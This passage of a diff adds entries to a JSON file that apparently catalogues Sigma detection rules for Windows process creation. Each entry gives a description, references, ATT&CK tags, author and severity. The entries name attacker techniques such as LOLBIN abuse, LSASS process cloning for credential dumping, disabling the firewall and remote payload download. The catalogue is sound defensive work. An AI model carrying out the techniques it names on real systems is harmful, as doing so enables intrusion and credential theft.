"logsource.product": "windows" + } + }, + { + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "value": "Format.com FileSystem LOLBIN", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_susp_format.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "uuid": "add64136-62e5-48ea-807e-88638d02df1e", + "value": "Fsutil Suspicious Invocation", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2019/09/26", + "filename": "proc_creation_win_susp_fsutil_usage.yml", + "author": "Ecco, E.M. Anhaus, oscd.community", + "level": "high", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", + "value": "Gpresult Display Group Policy Information", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ], + "creation_date": "2022/05/01", + "filename": "proc_creation_win_susp_gpresult.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a scheduled task with a GUID like name", + "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "value": "Suspicious Scheduled Task Name As GUID", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/10/31", + "filename": "proc_creation_win_susp_guid_task_name.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate software naming their tasks as GUIDs" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", + "value": "Suspicious GUP Usage", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2019/02/06", + "filename": "proc_creation_win_susp_gup.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", + "value": "Download Files Using Notepad++ GUP Utility", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535322182863179776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/06/10", + "filename": "proc_creation_win_susp_gup_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Other parent processes other than notepad++ using GUP that are not currently identified" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "value": "Execute Arbitrary Binaries Using GUP Utility", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535322445439180803", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/06/10", + "filename": "proc_creation_win_susp_gup_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Other parent binaries using GUP not currently identified" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use of hostname to get information", + "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", + "value": "Suspicious Execution of Hostname", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_hostname.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "value": "Suspicious IIS Module Registration", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/04", + "filename": "proc_creation_win_susp_iis_module_registration.yml", + "author": "Florian Roth (rule), Microsoft (idea)", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", + "value": "Execution Of Non-Existing File", + "meta": { + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/12/09", + "filename": "proc_creation_win_susp_image_missing.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", + "value": "Suspicious Execution of InstallUtil Without Log", + "meta": { + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/23", + "filename": "proc_creation_win_susp_instalutil.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "value": "Suspicious Invoke-WebRequest Usage", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/02", + "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious IIS native-code module installations via command line", + "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "value": "IIS Native-Code Module Command Line Installation", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/12/11", + "filename": "proc_creation_win_susp_iss_module_install.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "value": "Suspicious Execution of Shutdown to Log Out", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_susp_logoff.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "value": "Wscript Execution from Non C Drive", + "meta": { + "refs": [ + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", + "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", + "author": "Aaron Herman", + "level": "medium", + "falsepositive": [ + "Legitimate applications installed on other partitions such as \"D:\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Suspicious LSASS Process Clone", + "meta": { + "refs": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ], + "creation_date": "2021/11/27", + "filename": "proc_creation_win_susp_lsass_clone.yml", + "author": "Florian Roth, Samir Bousseaden", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use of reg to get MachineGuid information", + "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", + "value": "Suspicious Query of MachineGUID", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_machineguid.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "value": "Suspicious Microsoft OneNote Child Process", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" + ], + "creation_date": "2022/10/21", + "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "File located in the AppData folder with trusted signature" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", + "value": "Missing Space Characters in Command Lines", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/08/23", + "filename": "proc_creation_win_susp_missing_spaces.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", + "value": "Suspicious Mofcomp Execution", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_susp_mofcomp_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "value": "Mounted Share Deleted", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_susp_mounted_share_deletion.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "low", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", + "value": "MpiExec Lolbin", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1465058133303246867", + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "value": "Suspicious Msbuild Execution By Uncommon Parent Process", + "meta": { + "refs": [ + "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://www.echotrail.io/insights/search/msbuild.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/11/17", + "filename": "proc_creation_win_susp_msbuild.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "value": "MSHTA Suspicious Execution 01", + "meta": { + "refs": [ + "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "https://twitter.com/mattifestation/status/1326228491302563846", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" + ], + "creation_date": "2019/02/22", + "filename": "proc_creation_win_susp_mshta_execution.yml", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious mshta process patterns", + "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "value": "Suspicious MSHTA Process Patterns", + "meta": { + "refs": [ + "https://en.wikipedia.org/wiki/HTML_Application", + "https://www.echotrail.io/insights/search/mshta.exe", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ], + "creation_date": "2021/07/17", + "filename": "proc_creation_win_susp_mshta_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "value": "Mshtml DLL RunHTMLApplication Abuse", + "meta": { + "refs": [ + "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/14", + "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of msiexec from an uncommon directory", + "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "value": "Suspicious MsiExec Directory", + "meta": { + "refs": [ + "https://twitter.com/200_okay_/status/1194765831911215104", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2019/11/14", + "filename": "proc_creation_win_susp_msiexec_cwd.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "value": "MsiExec Web Install", + "meta": { + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2018/02/09", + "filename": "proc_creation_win_susp_msiexec_web_install.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Downloads payload from remote server", + "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "value": "Malicious Payload Download via Office Binaries", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "Reegun J (OCBC Bank)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_msoffice.yml", + "author": "Beyu Denis, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "value": "Suspicious Netsh Discovery Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2021/12/07", + "filename": "proc_creation_win_susp_netsh_discovery_command.yml", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "low", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects persitence via netsh helper", + "uuid": "56321594-9087-49d9-bf10-524fe8479452", + "value": "Suspicious Netsh DLL Persistence", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://attack.mitre.org/software/S0108/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.007", + "attack.s0108" + ], + "creation_date": "2019/10/25", + "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", + "author": "Victor Sergeev, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that turns off the Windows firewall", + "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "value": "Firewall Disabled via Netsh", + "meta": { + "refs": [ + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004", + "attack.s0108" + ], + "creation_date": "2019/11/01", + "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", + "author": "Fatih Sirin", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", + "uuid": "37e8d358-6408-4853-82f4-98333fca7014", + "value": "Execution of NetSupport RAT From Unusual Location", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/19", + "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "value": "Suspicious Network Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2021/12/07", + "filename": "proc_creation_win_susp_network_command.yml", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "low", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "value": "Suspicious Listing of Network Connections", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2021/12/10", + "filename": "proc_creation_win_susp_network_listing_connections.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "value": "Net.exe Execution", + "meta": { + "refs": [ + "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" + ], + "tags": 